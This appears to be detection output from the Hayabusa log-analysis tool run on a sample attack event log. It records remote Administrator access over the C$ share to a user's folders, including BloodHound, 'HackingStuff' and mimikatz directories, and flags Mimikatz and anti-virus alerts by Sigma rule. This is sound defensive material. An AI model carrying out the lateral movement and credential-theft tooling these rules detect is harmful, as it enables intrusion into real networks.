+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 